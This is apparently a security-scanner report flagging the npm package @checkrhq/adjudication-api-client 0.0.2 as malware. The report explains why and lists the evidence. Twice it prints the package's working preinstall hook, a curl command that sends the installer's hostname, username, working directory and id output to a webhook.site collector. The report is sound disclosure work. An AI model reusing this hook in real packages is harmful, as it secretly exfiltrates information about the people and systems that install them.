registry  /  @checkrhq/adjudication-api-client  /  0.0.2

@checkrhq/adjudication-api-client@0.0.2

This package is for testing only.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

The package executes an install-time shell command that exfiltrates host and user context. The endpoint is a generic webhook collector unrelated to an API client.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install / lifecycle preinstall
Impact
Leaks hostname, username, current directory, and Unix id details from the installer environment.
Mechanism
install-time curl exfiltration of system identity and working directory
Attack narrative
On package installation, npm invokes the preinstall script from package.json. The script runs curl to POST command-substitution output from hostname, whoami, pwd, and id to a webhook.site collector, then hides errors with || true. This is unconsented environment reconnaissance and exfiltration at install time.
Rationale
Read-only source inspection confirmed package.json contains the only executable behavior: an install lifecycle hook that sends installer identity and environment context to an unrelated external webhook. This is concrete malicious install-time data exfiltration, not package-aligned API client behavior.
Evidence
package.jsonREADME.md
Network endpoints1
webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines a preinstall lifecycle hook
  • preinstall runs curl during npm install
  • Script posts hostname, whoami, pwd, and id output
  • Data is sent to unrelated webhook.site URL
  • Script suppresses failures with || true
Evidence against
  • Inspected tree contains only README.md and package.json
  • No runtime entrypoint, persistence, destructive action, or AI-agent control-surface writes found
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.preinstall = curl -s --max-time 5 https://webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999 -d "h=$(hostname)&u=$(whoami)&d=$(pwd)&id=$(id)" || true
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.preinstall = curl -s --max-time 5 https://webhook.site/86f836d9-727b-42b9-9068-64e1dbbf0999 -d "h=$(hostname)&u=$(whoami)&d=$(pwd)&id=$(id)" || true
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High1 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present